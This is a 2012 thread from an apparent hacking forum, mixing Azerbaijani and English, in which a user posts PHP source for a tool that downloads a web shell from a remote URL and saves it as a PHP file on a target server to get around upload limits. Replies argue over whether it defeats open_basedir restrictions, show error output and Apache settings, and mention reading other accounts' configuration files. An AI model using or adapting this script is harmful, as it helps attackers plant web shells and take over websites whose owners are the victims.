Anti-armenia.ORG - Forumlar - [#] Bypass Upload Error With This Tool [ My Coded ]



Istifadəçi
    2012-09-15 22:11 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


Hello Guy'z (:

Just But Shell .txt URL He Will Change Name To [ krz.php ]

Here Tool : http://pastebin.com/EjCsE04h


Kod:
<?
# Coded By Dr.KroOoZ
# b0x[at]hotmail[dot]com
# Greets : b0x - fox hacker - sec4ever
# Homepage : www.sec4ever.com

echo '<title>Upload Files </title><form method="POST">';
echo '<center><b><font face="Tahoma" size="6">[#] Upload File !</font></b><br><br><br>';
echo '<p align="center"><input type="text" name="file">
<input type="submit" value="Get File"></p>';
$krz = $_POST['file'];
$file = file_get_contents($krz);
$b = fopen('krz.php', 'w'); // Change krz.php To Name Shell U Want :D
fwrite($b,$file);
fclose($b);
if($krz) {
echo '<br><p align="center"><font face="Tahoma" size="2" color="#808080">Done !</font></p>
<p align="center"><font color="#505B67" face="Tahoma" size="2">Open krz.php</font></p><br>'; }
else {
echo '<br><p align="center"><font face="Tahoma" size="2" color="#CC0000">Error</font><font face="Tahoma" size="2" color="#808080">
;(</font></p>
<p align="center"><font face="Tahoma" size="2" color="#808080">But Check File
Maybe Downloaded .. </font></p><br>'; }
echo '</form>';
echo '<p align="center" dir="ltr"><font face="Tahoma" style="font-size: 9pt">#&nbsp;
Ex : <font color="#454545">http://piratlar.com/shellz/ly0kha.txt</font></font></p>
<p align="center" dir="ltr"><font face="Tahoma" style="font-size: 9pt"># Coded
By<font color="#C0C0C0"> </font><font color="#808080">Dr.KroOoZ</font> |
<font color="#808080">b0x@hotmail.com</font></font></p>
<p align="center" dir="ltr"><font face="Tahoma" style="font-size: 9pt"># Note : i
Used <font color="#990000">file_get_contents</font> Function </font></p>';
?>

Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 22:20 GMT                 

Hacker_Expert



VIP
Mesaj Sayı : 15
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Thank u, Dr.KroOoZ...

Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 22:27 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Thanks.
I don't want to hurt you really but i just wonder WTF will do file_get_contents() PHP function if theris in ex open_basedir restriction? Or permission problem?

This is not vulnerability and exploit anymore.It may work for attacker if the server administrator total noob.

if server admin is noob sure there will be a lot of ways to read/write others configs,files etc.
In ex: fread(), or print_r(file('/home/blah/somelameserveradmin/public_html/blahconfig.hp'));


If i'm wrong bro correct me.


Thanks again.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 22:35 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


This Trick i Used With Arabic Server Work 100% (:

And print_r + fread u can read with this fucntion but not in disable fucntion

Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 22:43 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


This is what exactly i want to say to you dude)

In your case it is 100% misconfigured server.



Here is some demonstrationopen basedir)


Input: c:/boot.ini

Kod:
Warning: file_get_contents() [function.file-get-contents]: open_basedir restriction in effect. File(c:/boot.ini) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\up\guyabypass.php on line 12

Warning: file_get_contents(c:/boot.ini) [function.file-get-contents]: failed to open stream: Operation not permitted in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\up\guyabypass.php on line 12


Obviously it can't bypass .Because theris open basedir restriction.



//my Apache config
httpd.conf

SNIP:

Kod:
################## PER DIRECTORY OPEN BASEDIR RESTRICTION ##################################

<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/wordpress/wordpress">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/wordpress/wordpress;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>

<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/az/public_html">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/az/public_html;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>


<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/phpmyadmin">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/phpmyadmin;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>



<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/boss">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/boss;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>

<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/cpanel">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/cpanel;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>


<Directory "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn">
  php_admin_value open_basedir "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp"


</Directory>





Sure theris a lot ways to bypass open basedir PHP > 5.2.17 (design flaw 0day) but it is not subject of our topic.




Anyways,Thanks for share.I really appreciate your works.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:09 GMT                 

TheRock



Gold
Mesaj Sayı : 71
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : xsecurity
Yaş :
Mesaj :

Mövzunu Paylaş!


Thank's a lot.

@AnOps, bəzi serverlərdə upload üçün bypass methodudur. (qısaca desək upload problemi yaşadığın zaman bəlkə bu sənin işinə yaraya bilər.)
ancaq Dr.Kroooz bro'muzun dediyinə görə bu scriptin işləməsi üçün orda bəlli bir funksiyalar var ki, onlar server tərəfindən əngəlləməmiş vəziyyətdə olmalıdır.

AATeam | EH
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:14 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@TheRock yanılırsan bax yuxarıda da onu demişəm.Burda bypasslıq ümumiyyətlə heçnə yoxdur.
İndi Dr.Krooz-un əlinə hansısa bir partdaq server düşüb(düzgün idarə olunmayan) orda bunu istifadə edib keçib)

heçnə yox adi open basedir restriction olsun görüm kim necə bypass edə bilər bu metodla.
İnanmırsınızsa bir dənə web server qurun ya shell verim heçnə yox adi open basedir restrictionla görüm necə bypass edərsiniz file_get_contents() ilə))

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:18 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


hmm i think same protection in az security server but im wrong with that think

i used tool in arabic server's

but please english :S:S::S:S:S:S

Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:24 GMT                 

TheRock



Gold
Mesaj Sayı : 71
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : xsecurity
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#12397 BlackMinD :
@TheRock yanılırsan bax yuxarıda da onu demişəm.Burda bypasslıq ümumiyyətlə heçnə yoxdur.
İndi Dr.Krooz-un əlinə hansısa bir partdaq server düşüb(düzgün idarə olunmayan) orda bunu istifadə edib keçib)

heçnə yox adi open basedir restriction olsun görüm kim necə bypass edə bilər bu metodla.
İnanmırsınızsa bir dənə web server qurun ya shell verim heçnə yox adi open basedir restrictionla görüm necə bypass edərsiniz file_get_contents() ilə))



Elə məndə onu demişəm bəlkə işə yarar.

AATeam | EH
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:34 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@TheRock

Sitat

TheRock
Thank's a lot.

@AnOps, bəzi serverlərdə upload üçün bypass methodudur. (qısaca desək upload problemi yaşadığın zaman bəlkə bu sənin işinə yaraya bilər.)


Upload Bypass adlana termin yoxdur.Burda həm də söhbət tam başqadıre)



Sitat

ancaq Dr.Kroooz bro'muzun dediyinə görə bu scriptin işləməsi üçün orda bəlli bir funksiyalar var ki, onlar server tərəfindən əngəlləməmiş vəziyyətdə olmalıdır.


O tipli siz də məni bağışlayın partdaq bir server varsa nə disable edilir edilsin oxumaq 2x2-dir)


Heçnə yox adi PHP-ni öyrənin başa düşərsiniz nə var nə yox...

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-09-15 23:36 GMT                 

TheRock



Gold
Mesaj Sayı : 71
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : xsecurity
Yaş :
Mesaj :

Mövzunu Paylaş!


Aman bos ver PHP ni o beni öyrensin

AATeam | EH
Anti-armenia.ORG
    

Istifadəçi
    2012-09-16 16:25 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Thanks

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2012-12-28 19:59 GMT                 

herocom



İstifadəçi
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : coder's,programmer,grafiker,hacker
Yaş : 37
Mesaj :

Mövzunu Paylaş!


thank you!

[hide.]:)[/hide.]
Anti-armenia.ORG